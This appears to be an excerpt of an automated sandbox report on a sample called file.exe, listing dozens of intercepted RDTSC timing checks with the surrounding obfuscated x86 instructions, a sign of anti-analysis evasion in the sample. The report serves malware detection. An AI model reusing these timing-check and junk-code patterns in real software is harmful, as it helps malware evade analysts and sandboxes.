                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F850 second address: C7F854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F854 second address: C7F866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB97CFF015Ah 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81E94 second address: C81E98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81E98 second address: C81E9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81E9C second address: C81EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81EAB second address: C81EB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81F55 second address: C81F62 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81F62 second address: C81F6C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB97CFF0156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81F6C second address: C81FA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFE921Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D26CDh], edi 0x00000010 or esi, 22926E38h 0x00000016 push 00000000h 0x00000018 push 360EFE41h 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FB97CFE9226h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81FA7 second address: C81FAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81FAB second address: C82030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d xor dword ptr [esp], 360EFEC1h 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007FB97CFE9218h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e jnp 00007FB97CFE922Dh 0x00000034 mov dh, bl 0x00000036 push 00000003h 0x00000038 mov ecx, dword ptr [ebp+122D2A02h] 0x0000003e push 00000000h 0x00000040 clc 0x00000041 mov ch, EDh 0x00000043 push 00000003h 0x00000045 jno 00007FB97CFE921Ch 0x0000004b call 00007FB97CFE9219h 0x00000050 push eax 0x00000051 push edx 0x00000052 jc 00007FB97CFE921Ch 0x00000058 je 00007FB97CFE9216h 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C82030 second address: C82051 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FB97CFF0156h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 jmp 00007FB97CFF015Eh 0x00000017 pop edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C82051 second address: C82057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C82057 second address: C8205B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8205B second address: C82077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push ecx 0x0000000d jnc 00007FB97CFE9218h 0x00000013 pop ecx 0x00000014 mov eax, dword ptr [eax] 0x00000016 pushad 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C82077 second address: C8207F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C822A9 second address: C822CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFE9225h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007FB97CFE9216h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C822CE second address: C822D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C822D2 second address: C822D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C822D8 second address: C822DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA3624 second address: CA362A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA362A second address: CA3630 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA12E1 second address: CA12F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FB97CFE9216h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA12F0 second address: CA12F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1656 second address: CA166F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFE9222h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA17CC second address: CA17D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA17D2 second address: CA17DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB97CFE9216h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA17DD second address: CA17E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA17E3 second address: CA17E9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1AA8 second address: CA1AB5 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB97CFF0156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1AB5 second address: CA1ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1C26 second address: CA1C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1C2C second address: CA1C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FB97CFE921Fh 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1C46 second address: CA1C59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFF015Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1DFF second address: CA1E03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1E03 second address: CA1E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1E09 second address: CA1E1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB97CFE921Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1E1C second address: CA1E4C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB97CFF0166h 0x0000000c jmp 00007FB97CFF0161h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1F91 second address: CA1FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB97CFE9223h 0x00000009 jo 00007FB97CFE9216h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1FB4 second address: CA1FD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push edx 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007FB97CFF0163h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA22B6 second address: CA22BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA22BC second address: CA22D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFF0164h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA22D4 second address: CA22DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA22DA second address: CA22E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB97CFF0156h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C98473 second address: C98478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA2750 second address: CA2754 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA2754 second address: CA275F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA2E79 second address: CA2E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB97CFF0156h 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA2E84 second address: CA2EAC instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB97CFE9218h 0x00000008 push esi 0x00000009 pop esi 0x0000000a jg 00007FB97CFE9232h 0x00000010 jmp 00007FB97CFE9226h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA300D second address: CA3016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA3016 second address: CA3020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB97CFE9216h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA3191 second address: CA3195 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA3195 second address: CA31D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB97CFE9221h 0x0000000b pushad 0x0000000c jo 00007FB97CFE9216h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jo 00007FB97CFE9216h 0x0000001a popad 0x0000001b jmp 00007FB97CFE9223h 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA347A second address: CA3485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA3485 second address: CA34A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFE9229h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA808F second address: CA80AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFF0167h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA80AA second address: CA80B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA80B0 second address: CA80BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAE31C second address: CAE320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB0549 second address: CB054F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB054F second address: CB0553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB3302 second address: CB3306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB3442 second address: CB347E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007FB97CFE9224h 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e jbe 00007FB97CFE9222h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 je 00007FB97CFE921Ah 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB347E second address: CB3486 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB3486 second address: CB348A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB38F4 second address: CB38F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB38F8 second address: CB38FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB466E second address: CB4673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB505E second address: CB5063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5108 second address: CB510D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5403 second address: CB5408 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB562F second address: CB563A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FB97CFF0156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB563A second address: CB5660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a sub dword ptr [ebp+122D2721h], ebx 0x00000010 mov di, A196h 0x00000014 xchg eax, ebx 0x00000015 pushad 0x00000016 jmp 00007FB97CFE921Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d push edi 0x0000001e pop edi 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5660 second address: CB567A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB97CFF0156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f jmp 00007FB97CFF015Ah 0x00000014 pop eax 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB567A second address: CB5680 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5680 second address: CB5684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5B3E second address: CB5B50 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jne 00007FB97CFE9216h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5B50 second address: CB5BD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFF015Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FB97CFF0158h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 mov esi, dword ptr [ebp+122D2AB6h] 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007FB97CFF0158h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 0000001Bh 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 mov edi, dword ptr [ebp+122D26DBh] 0x0000004d or dword ptr [ebp+122D24AFh], eax 0x00000053 push 00000000h 0x00000055 sub dword ptr [ebp+122D2684h], edx 0x0000005b push eax 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007FB97CFF015Dh 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5BD5 second address: CB5BD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB650C second address: CB6517 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB6517 second address: CB651D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7B31 second address: CB7B3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7B3B second address: CB7B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7B3F second address: CB7B74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFF0163h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB97CFF0169h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB9260 second address: CB9264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB9264 second address: CB9268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB8FA6 second address: CB8FAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB9268 second address: CB92A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a add dword ptr [ebp+122D272Fh], esi 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007FB97CFF0158h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov dword ptr [ebp+122D2E22h], edi 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB8FAA second address: CB8FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB92A9 second address: CB92AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB92AD second address: CB92B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB9998 second address: CB99BC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FB97CFF0163h 0x0000000f jng 00007FB97CFF0156h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBA698 second address: CBA69E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBDAE1 second address: CBDB06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FB97CFF0156h 0x0000000a jmp 00007FB97CFF015Bh 0x0000000f jmp 00007FB97CFF015Fh 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0B8E second address: CC0B92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
